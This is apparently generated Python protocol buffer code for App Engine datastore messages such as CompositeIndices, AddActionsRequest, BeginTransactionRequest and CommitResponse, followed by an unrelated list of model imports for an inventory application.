  def OutputUnchecked(self, out):
    out.putVarInt32(8)
    out.putVarInt64(self.start_)
    out.putVarInt32(16)
    out.putVarInt64(self.end_)
    if (self.has_cost_):
      out.putVarInt32(26)
      out.putVarInt32(self.cost_.ByteSize())
      self.cost_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_start_):
      out.putVarInt32(8)
      out.putVarInt64(self.start_)
    if (self.has_end_):
      out.putVarInt32(16)
      out.putVarInt64(self.end_)
    if (self.has_cost_):
      out.putVarInt32(26)
      out.putVarInt32(self.cost_.ByteSizePartial())
      self.cost_.OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 8:
        self.set_start(d.getVarInt64())
        continue
      if tt == 16:
        self.set_end(d.getVarInt64())
        continue
      if tt == 26:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cost().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_start_: res+=prefix+("start: %s\n" % self.DebugFormatInt64(self.start_))
    if self.has_end_: res+=prefix+("end: %s\n" % self.DebugFormatInt64(self.end_))
    if self.has_cost_:
      res+=prefix+"cost <\n"
      res+=self.cost_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kstart = 1
  kend = 2
  kcost = 3

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "start",
    2: "end",
    3: "cost",
  }, 3)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.NUMERIC,
    2: ProtocolBuffer.Encoder.NUMERIC,
    3: ProtocolBuffer.Encoder.STRING,
  }, 3, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.AllocateIdsResponse'
class CompositeIndices(ProtocolBuffer.ProtocolMessage):

  def __init__(self, contents=None):
    self.index_ = []
    if contents is not None: self.MergeFromString(contents)

  def index_size(self): return len(self.index_)
  def index_list(self): return self.index_

  def index(self, i):
    return self.index_[i]

  def mutable_index(self, i):
    return self.index_[i]

  def add_index(self):
    x = CompositeIndex()
    self.index_.append(x)
    return x

  def clear_index(self):
    self.index_ = []

  def MergeFrom(self, x):
    assert x is not self
    for i in xrange(x.index_size()): self.add_index().CopyFrom(x.index(i))

  def Equals(self, x):
    if x is self: return 1
    if len(self.index_) != len(x.index_): return 0
    for e1, e2 in zip(self.index_, x.index_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    for p in self.index_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    n = 0
    n += 1 * len(self.index_)
    for i in xrange(len(self.index_)): n += self.lengthString(self.index_[i].ByteSize())
    return n

  def ByteSizePartial(self):
    n = 0
    n += 1 * len(self.index_)
    for i in xrange(len(self.index_)): n += self.lengthString(self.index_[i].ByteSizePartial())
    return n

  def Clear(self):
    self.clear_index()

  def OutputUnchecked(self, out):
    for i in xrange(len(self.index_)):
      out.putVarInt32(10)
      out.putVarInt32(self.index_[i].ByteSize())
      self.index_[i].OutputUnchecked(out)

  def OutputPartial(self, out):
    for i in xrange(len(self.index_)):
      out.putVarInt32(10)
      out.putVarInt32(self.index_[i].ByteSizePartial())
      self.index_[i].OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_index().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    cnt=0
    for e in self.index_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("index%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kindex = 1

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "index",
  }, 1)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
  }, 1, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.CompositeIndices'
class AddActionsRequest(ProtocolBuffer.ProtocolMessage):
  has_header_ = 0
  header_ = None
  has_transaction_ = 0

  def __init__(self, contents=None):
    self.transaction_ = Transaction()
    self.action_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def transaction(self): return self.transaction_

  def mutable_transaction(self): self.has_transaction_ = 1; return self.transaction_

  def clear_transaction(self):self.has_transaction_ = 0; self.transaction_.Clear()

  def has_transaction(self): return self.has_transaction_

  def action_size(self): return len(self.action_)
  def action_list(self): return self.action_

  def action(self, i):
    return self.action_[i]

  def mutable_action(self, i):
    return self.action_[i]

  def add_action(self):
    x = Action()
    self.action_.append(x)
    return x

  def clear_action(self):
    self.action_ = []

  def MergeFrom(self, x):
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    if (x.has_transaction()): self.mutable_transaction().MergeFrom(x.transaction())
    for i in xrange(x.action_size()): self.add_action().CopyFrom(x.action(i))

  def Equals(self, x):
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if self.has_transaction_ != x.has_transaction_: return 0
    if self.has_transaction_ and self.transaction_ != x.transaction_: return 0
    if len(self.action_) != len(x.action_): return 0
    for e1, e2 in zip(self.action_, x.action_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    if (not self.has_transaction_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: transaction not set.')
    elif not self.transaction_.IsInitialized(debug_strs): initialized = 0
    for p in self.action_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += self.lengthString(self.transaction_.ByteSize())
    n += 1 * len(self.action_)
    for i in xrange(len(self.action_)): n += self.lengthString(self.action_[i].ByteSize())
    return n + 1

  def ByteSizePartial(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    if (self.has_transaction_):
      n += 1
      n += self.lengthString(self.transaction_.ByteSizePartial())
    n += 1 * len(self.action_)
    for i in xrange(len(self.action_)): n += self.lengthString(self.action_[i].ByteSizePartial())
    return n

  def Clear(self):
    self.clear_header()
    self.clear_transaction()
    self.clear_action()

  def OutputUnchecked(self, out):
    out.putVarInt32(10)
    out.putVarInt32(self.transaction_.ByteSize())
    self.transaction_.OutputUnchecked(out)
    for i in xrange(len(self.action_)):
      out.putVarInt32(18)
      out.putVarInt32(self.action_[i].ByteSize())
      self.action_[i].OutputUnchecked(out)
    if (self.has_header_):
      out.putVarInt32(26)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_transaction_):
      out.putVarInt32(10)
      out.putVarInt32(self.transaction_.ByteSizePartial())
      self.transaction_.OutputPartial(out)
    for i in xrange(len(self.action_)):
      out.putVarInt32(18)
      out.putVarInt32(self.action_[i].ByteSizePartial())
      self.action_[i].OutputPartial(out)
    if (self.has_header_):
      out.putVarInt32(26)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_transaction().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_action().TryMerge(tmp)
        continue
      if tt == 26:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_transaction_:
      res+=prefix+"transaction <\n"
      res+=self.transaction_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.action_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("action%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kheader = 3
  ktransaction = 1
  kaction = 2

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "transaction",
    2: "action",
    3: "header",
  }, 3)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.STRING,
  }, 3, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.AddActionsRequest'
class AddActionsResponse(ProtocolBuffer.ProtocolMessage):

  def __init__(self, contents=None):
    pass
    if contents is not None: self.MergeFromString(contents)


  def MergeFrom(self, x):
    assert x is not self

  def Equals(self, x):
    if x is self: return 1
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    return initialized

  def ByteSize(self):
    n = 0
    return n

  def ByteSizePartial(self):
    n = 0
    return n

  def Clear(self):
    pass

  def OutputUnchecked(self, out):
    pass

  def OutputPartial(self, out):
    pass

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])


  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
  }, 0)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
  }, 0, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.AddActionsResponse'
class BeginTransactionRequest(ProtocolBuffer.ProtocolMessage):
  has_header_ = 0
  header_ = None
  has_app_ = 0
  app_ = ""
  has_allow_multiple_eg_ = 0
  allow_multiple_eg_ = 0

  def __init__(self, contents=None):
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def app(self): return self.app_

  def set_app(self, x):
    self.has_app_ = 1
    self.app_ = x

  def clear_app(self):
    if self.has_app_:
      self.has_app_ = 0
      self.app_ = ""

  def has_app(self): return self.has_app_

  def allow_multiple_eg(self): return self.allow_multiple_eg_

  def set_allow_multiple_eg(self, x):
    self.has_allow_multiple_eg_ = 1
    self.allow_multiple_eg_ = x

  def clear_allow_multiple_eg(self):
    if self.has_allow_multiple_eg_:
      self.has_allow_multiple_eg_ = 0
      self.allow_multiple_eg_ = 0

  def has_allow_multiple_eg(self): return self.has_allow_multiple_eg_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    if (x.has_app()): self.set_app(x.app())
    if (x.has_allow_multiple_eg()): self.set_allow_multiple_eg(x.allow_multiple_eg())

  def Equals(self, x):
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if self.has_app_ != x.has_app_: return 0
    if self.has_app_ and self.app_ != x.app_: return 0
    if self.has_allow_multiple_eg_ != x.has_allow_multiple_eg_: return 0
    if self.has_allow_multiple_eg_ and self.allow_multiple_eg_ != x.allow_multiple_eg_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    if (not self.has_app_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: app not set.')
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += self.lengthString(len(self.app_))
    if (self.has_allow_multiple_eg_): n += 2
    return n + 1

  def ByteSizePartial(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    if (self.has_app_):
      n += 1
      n += self.lengthString(len(self.app_))
    if (self.has_allow_multiple_eg_): n += 2
    return n

  def Clear(self):
    self.clear_header()
    self.clear_app()
    self.clear_allow_multiple_eg()

  def OutputUnchecked(self, out):
    out.putVarInt32(10)
    out.putPrefixedString(self.app_)
    if (self.has_allow_multiple_eg_):
      out.putVarInt32(16)
      out.putBoolean(self.allow_multiple_eg_)
    if (self.has_header_):
      out.putVarInt32(26)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_app_):
      out.putVarInt32(10)
      out.putPrefixedString(self.app_)
    if (self.has_allow_multiple_eg_):
      out.putVarInt32(16)
      out.putBoolean(self.allow_multiple_eg_)
    if (self.has_header_):
      out.putVarInt32(26)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_app(d.getPrefixedString())
        continue
      if tt == 16:
        self.set_allow_multiple_eg(d.getBoolean())
        continue
      if tt == 26:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_app_: res+=prefix+("app: %s\n" % self.DebugFormatString(self.app_))
    if self.has_allow_multiple_eg_: res+=prefix+("allow_multiple_eg: %s\n" % self.DebugFormatBool(self.allow_multiple_eg_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kheader = 3
  kapp = 1
  kallow_multiple_eg = 2

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "app",
    2: "allow_multiple_eg",
    3: "header",
  }, 3)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.NUMERIC,
    3: ProtocolBuffer.Encoder.STRING,
  }, 3, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.BeginTransactionRequest'
class CommitResponse_Version(ProtocolBuffer.ProtocolMessage):
  has_root_entity_key_ = 0
  has_version_ = 0
  version_ = 0

  def __init__(self, contents=None):
    self.root_entity_key_ = Reference()
    if contents is not None: self.MergeFromString(contents)

  def root_entity_key(self): return self.root_entity_key_

  def mutable_root_entity_key(self): self.has_root_entity_key_ = 1; return self.root_entity_key_

  def clear_root_entity_key(self):self.has_root_entity_key_ = 0; self.root_entity_key_.Clear()

  def has_root_entity_key(self): return self.has_root_entity_key_

  def version(self): return self.version_

  def set_version(self, x):
    self.has_version_ = 1
    self.version_ = x

  def clear_version(self):
    if self.has_version_:
      self.has_version_ = 0
      self.version_ = 0

  def has_version(self): return self.has_version_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_root_entity_key()): self.mutable_root_entity_key().MergeFrom(x.root_entity_key())
    if (x.has_version()): self.set_version(x.version())

  def Equals(self, x):
    if x is self: return 1
    if self.has_root_entity_key_ != x.has_root_entity_key_: return 0
    if self.has_root_entity_key_ and self.root_entity_key_ != x.root_entity_key_: return 0
    if self.has_version_ != x.has_version_: return 0
    if self.has_version_ and self.version_ != x.version_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (not self.has_root_entity_key_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: root_entity_key not set.')
    elif not self.root_entity_key_.IsInitialized(debug_strs): initialized = 0
    if (not self.has_version_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: version not set.')
    return initialized

  def ByteSize(self):
    n = 0
    n += self.lengthString(self.root_entity_key_.ByteSize())
    n += self.lengthVarInt64(self.version_)
    return n + 2

  def ByteSizePartial(self):
    n = 0
    if (self.has_root_entity_key_):
      n += 1
      n += self.lengthString(self.root_entity_key_.ByteSizePartial())
    if (self.has_version_):
      n += 1
      n += self.lengthVarInt64(self.version_)
    return n

  def Clear(self):
    self.clear_root_entity_key()
    self.clear_version()

  def OutputUnchecked(self, out):
    out.putVarInt32(34)
    out.putVarInt32(self.root_entity_key_.ByteSize())
    self.root_entity_key_.OutputUnchecked(out)
    out.putVarInt32(40)
    out.putVarInt64(self.version_)

  def OutputPartial(self, out):
    if (self.has_root_entity_key_):
      out.putVarInt32(34)
      out.putVarInt32(self.root_entity_key_.ByteSizePartial())
      self.root_entity_key_.OutputPartial(out)
    if (self.has_version_):
      out.putVarInt32(40)
      out.putVarInt64(self.version_)

  def TryMerge(self, d):
    while 1:
      tt = d.getVarInt32()
      if tt == 28: break
      if tt == 34:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_root_entity_key().TryMerge(tmp)
        continue
      if tt == 40:
        self.set_version(d.getVarInt64())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_root_entity_key_:
      res+=prefix+"root_entity_key <\n"
      res+=self.root_entity_key_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatInt64(self.version_))
    return res

class CommitResponse(ProtocolBuffer.ProtocolMessage):
  has_cost_ = 0
  cost_ = None

  def __init__(self, contents=None):
    self.version_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def cost(self):
    if self.cost_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.cost_ is None: self.cost_ = Cost()
      finally:
        self.lazy_init_lock_.release()
    return self.cost_

  def mutable_cost(self): self.has_cost_ = 1; return self.cost()

  def clear_cost(self):

    if self.has_cost_:
      self.has_cost_ = 0;
      if self.cost_ is not None: self.cost_.Clear()

  def has_cost(self): return self.has_cost_

  def version_size(self): return len(self.version_)
  def version_list(self): return self.version_

  def version(self, i):
    return self.version_[i]

  def mutable_version(self, i):
    return self.version_[i]

  def add_version(self):
    x = CommitResponse_Version()
    self.version_.append(x)
    return x

  def clear_version(self):
    self.version_ = []

  def MergeFrom(self, x):
    assert x is not self
    if (x.has_cost()): self.mutable_cost().MergeFrom(x.cost())
    for i in xrange(x.version_size()): self.add_version().CopyFrom(x.version(i))

  def Equals(self, x):
    if x is self: return 1
    if self.has_cost_ != x.has_cost_: return 0
    if self.has_cost_ and self.cost_ != x.cost_: return 0
    if len(self.version_) != len(x.version_): return 0
    for e1, e2 in zip(self.version_, x.version_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_cost_ and not self.cost_.IsInitialized(debug_strs)): initialized = 0
    for p in self.version_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSize())
    n += 2 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.version_[i].ByteSize()
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSizePartial())
    n += 2 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.version_[i].ByteSizePartial()
    return n

  def Clear(self):
    self.clear_cost()
    self.clear_version()

  def OutputUnchecked(self, out):
    if (self.has_cost_):
      out.putVarInt32(10)
      out.putVarInt32(self.cost_.ByteSize())
      self.cost_.OutputUnchecked(out)
    for i in xrange(len(self.version_)):
      out.putVarInt32(27)
      self.version_[i].OutputUnchecked(out)
      out.putVarInt32(28)

  def OutputPartial(self, out):
    if (self.has_cost_):
      out.putVarInt32(10)
      out.putVarInt32(self.cost_.ByteSizePartial())
      self.cost_.OutputPartial(out)
    for i in xrange(len(self.version_)):
      out.putVarInt32(27)
      self.version_[i].OutputPartial(out)
      out.putVarInt32(28)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cost().TryMerge(tmp)
        continue
      if tt == 27:
        self.add_version().TryMerge(d)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_cost_:
      res+=prefix+"cost <\n"
      res+=self.cost_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.version_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("Version%s {\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
      cnt+=1
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kcost = 1
  kVersionGroup = 3
  kVersionroot_entity_key = 4
  kVersionversion = 5

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "cost",
    3: "Version",
    4: "root_entity_key",
    5: "version",
  }, 5)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.STARTGROUP,
    4: ProtocolBuffer.Encoder.STRING,
    5: ProtocolBuffer.Encoder.NUMERIC,
  }, 5, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.CommitResponse'
if _extension_runtime:
  pass

__all__ = ['InternalHeader','Transaction','Query','Query_Filter','Query_Order','CompiledQuery','CompiledQuery_PrimaryScan','CompiledQuery_MergeJoinScan','CompiledQuery_EntityFilter','CompiledCursor','CompiledCursor_PositionIndexValue','CompiledCursor_Position','Cursor','Error','Cost','Cost_CommitCost','GetRequest','GetResponse','GetResponse_Entity','PutRequest','PutResponse','TouchRequest','TouchResponse','DeleteRequest','DeleteResponse','NextRequest','QueryResult','AllocateIdsRequest','AllocateIdsResponse','CompositeIndices','AddActionsRequest','AddActionsResponse','BeginTransactionRequest','CommitResponse','CommitResponse_Version']

from .image import Image
from .product_category import ProductCategory
from .supplier import Supplier, PaymentMethod
from .product import Product
from .product import ProductImage
from .enum_values import EnumValues
from .related_values import RelatedValues
from .customer import Customer
from .expense import Expense
from .incoming import Incoming
from .shipping import Shipping, ShippingLine
from .receiving import Receiving, ReceivingLine
from .inventory_transaction import InventoryTransaction, InventoryTransactionLine
from .purchase_order import PurchaseOrder, PurchaseOrderLine
from .sales_order import SalesOrder, SalesOrderLine
from .user import User
from .role import Role, roles_users
from .organization import Organization
from .inventory_in_out_link import InventoryInOutLink
from .aspects import update_menemonic
from .product_inventory import ProductInventory
